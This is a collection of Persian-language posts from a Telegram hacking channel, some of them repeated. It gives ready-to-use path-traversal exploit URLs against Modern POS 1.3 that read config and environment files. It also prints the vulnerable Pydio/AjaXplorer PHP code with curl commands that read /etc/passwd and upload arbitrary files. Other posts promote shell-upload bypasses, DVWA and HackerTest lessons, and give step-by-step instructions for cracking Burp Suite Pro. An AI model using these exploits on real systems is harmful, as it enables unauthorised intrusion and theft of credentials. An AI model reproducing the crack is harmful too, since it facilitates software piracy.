#Arbitrary #File #Download #LFI #RFI #Modern_POS v1.3
—————————————————--
اسیب پذیری فایل دانلود در Modern POS 1.3
=================================
نحوه ی اسکپلویت کردن :::
http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
///———————
http://localhost/[PATH]/
این قسمت دامین شما یا تارکت میباشد.

_inc/bridges/php-local/index.php?action=download&path=
با اضافه کردن این قسمت به اخر دامین به محل اسیب پذیری دسترسی پیدا میکنید.

[FILE]
در این قسمت دستورات مربوط به RFI or LFI رو وارد کنید مانند :::

_inc/bridges/php-local/index.php?action=download&path=../../../config.php

_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ
======================
لینک برنامه :
Program
(https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683)
لینک اکسپلویت ثبت شده :
Exploit
(https://www.exploit-db.com/exploits/46137)
======================
@ t.me/LearnExploit
@ IR0Day.Today Boy's (https://t.me/learnexploit)

#Hackertest ( #Hackertest_net ) #Part_7 part 7
———————————————-
با سلام و خسته نباشید خدمت دوستان.

|- جلسه ی هفتم از سری اموزش های تست نفوذ در سایت `HackerTest.Net `در خدمت شما هستیم :

مراحل و نحوه ی پیدا کردن پسورد ::
1 - وارد سورس پیج شوید در level 7

2 - با کمی دقت میبینید که نتیجه ای از کد های موجود در جاوا اسکریپت و بخش form بدست نیاوردید.
پس باید user and pass مد نظر ما در قسمتی از بکگراند باشه یا در محلی خارج از این سورس (همون قضیه ی تگ SRC در جلسه ی قبلی)!
خب بعد از مطالعه ی کد ها میبینیم که user and pass مد نظر در محل دیگری از سورس نیس !
پس احتمال اینکه در بکگراند باشه زیاد میشه.
نکته : اگر بخوایید دنبال چیزی در بکگراند باشید باید به تگ body رفته در ان قسمت جستجو کنید.
با مطالعه این تگ میفهمیم که برنامه نویس
در بخش
bg="images/included.gif"
یک عکس در بکگراند تعریف کرده !
احتمال اینکه user and pass در این عکس باشه زیاده (شرایط خاص در sqli !)
3 - برای اینکه وارد قسمتی که عکس یا همان گیف در ان قرار دارد وارد شویم کافیه بخش :
images/included.gif
گرفته و به اخر Url سایت اضافه کنیم
یعنی چیزی شبیه به زیر :
http://www.hackertest.net/images/included.gif
4 - اگر دقت کنید user and pass در قسمت سمت راست و پایین برای ما قرار داده شده.
User : phat
Pass : jerkeybar3
امید وارم که از این قسمت هم نهایت استفاده روکنید دوستان.
باتشکر ادمین کانال 0Day.Today .
———————
1 - Part 1
(https://t.me/LearnExploit/370)
//———-
2 - Part 2
(https://t.me/LearnExploit/373)
//———-
3 - Part 3
(https://t.me/LearnExploit/380)
//———-
4 - Part 4
(https://t.me/LearnExploit/513)
// ———-
5 - Part 6
(https://t.me/LearnExploit/524)
——————————————
linux@0day:~#./@LearnExploit
IR0Day.Today Boy's

☘️🍀🌱🌿🍃🌵
🌷🌹🥀🌺💐
🍂🍁💐🌾
🌸🌼🌻
💫⭐️
🔥
#سوپرایز #سوپرایز
همچنان که دوره های Hackertest.net
و تست نفوذ با DVWA در کانال ادامه دارد
سوپرایز ویژه ای هم در راه هست
😁
منتظر سوپرایزهای ویژه ای باشید.☢️
کانال مارو به دوستاتون معرفی کنید :
🆔 : @LearnExploit
🆔 : @IR0Day_Today
🔥
💫⭐️
🌸🌼🌻
🍂🍁💐🌾
🌷🌹🥀🌺💐
☘️🍀🌱🌿🍃🌵

💻⌨️🖥
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)

💻⌨️🖥
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)

🔺🔻🔸🔹🔶🔷
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️

#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-

#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5

➖➖➖➖➖➖➖➖➖➖

#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::

<?php

$vars = array_merge($_GET, $_POST);

if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}

?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.

option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
/plugins/editor.zoho/agent/files
ادرس پیشفرض برای خواندن فایل های اپلود شده :
/plugins/editor.zoho/data/files/
➖➖➖➖➖➖➖➖➖➖
#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"

مانند :

"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"

مانند :

curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"

➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link

————————————-
@LearnExploit - 0DayBoy 's in Iran :)

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
اموزش نحوه ی نصب Burp Suite Pro روی ویندوز 10 ::
(طبق توضیحات و عکس پیش برید دوستان )
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
BurpSuite Pro V 1.7.35
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 1 ::
بر روی Loader.jar بزنید و منتظر ران شدن برنامه باشید.
➖➖➖
⚠️ نکته خیلی مهم :
برای اینکه برنامه به درستی کار کنه باید نسخه java شما 8 باشه دوستان برای بدست اورد نسخه java از
java -version
در cmd میتوانید استفاده کنید.
برای دانلود java v 8 اینجا کلیک کنید.
➖➖➖
بعد از ران شدن برنامه طبق عکس لایسنس رو کپی کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 2 :::
لایسنس رو در کادر کپی کنید با استفاده از کلید های ctrl + v و بعد بر روی next بزنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 3 :::
بر روی manual activation کلیک کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 4 :::
لایسنس کادر مشخص شده را کپی کنید. (با استفاده از کلید های ctrl +A و ctrl + C) یا با استفاده از copy request.

➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 5 :::
لایسنس را در کادر مشخص شده paste کنید (ctrl + V).
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 6 :::
با انجام عملیان مرحله 5 محتویات کادر سوم ظاعر میشود.
لایسنس کادر مشخص شده را کپی کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 7 :::
محتویات کپی کرده را در بخش سوم وارد کنید. و سپس بر روی next کلیک کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 8 :::
عملیات با موفقیت به پایان رسید و برنامه کرک شد.
برای اجرای دوباره ی برنامه لازمه که شما دوباره Loader.jar را ران کنید و سپس بر روی Run بزنید. (اگر برنامه را به درستی کرک کردید BurpSuite Pro اجرا مشود.)
با تشکر.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit

#Pentesting Dvwa
#Part_2 (2)
#Level : #Low
#BruteForce_Attacks
BruteForce Attacks
————————————
⭕️ دوره ی تست نفوذ باگ ها با برنامه DVWA
⭕️ اشنایی و نحوه ی انجام حملات Brute Force :
⭕️ جلسه ی : 2
⭕️ سطح : آسان
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#Pentesting Dvwa
#Part_2 (2)
#Level : #Low
#BruteForce_Attacks
BruteForce Attacks
————————————
⭕️ دوره ی تست نفوذ باگ ها با برنامه DVWA
⭕️ اشنایی و نحوه ی انجام حملات Brute Force :
⭕️ جلسه ی : 2
⭕️ سطح : آسان
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

🔰#PCI Php Code Injection #Vulnerable
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's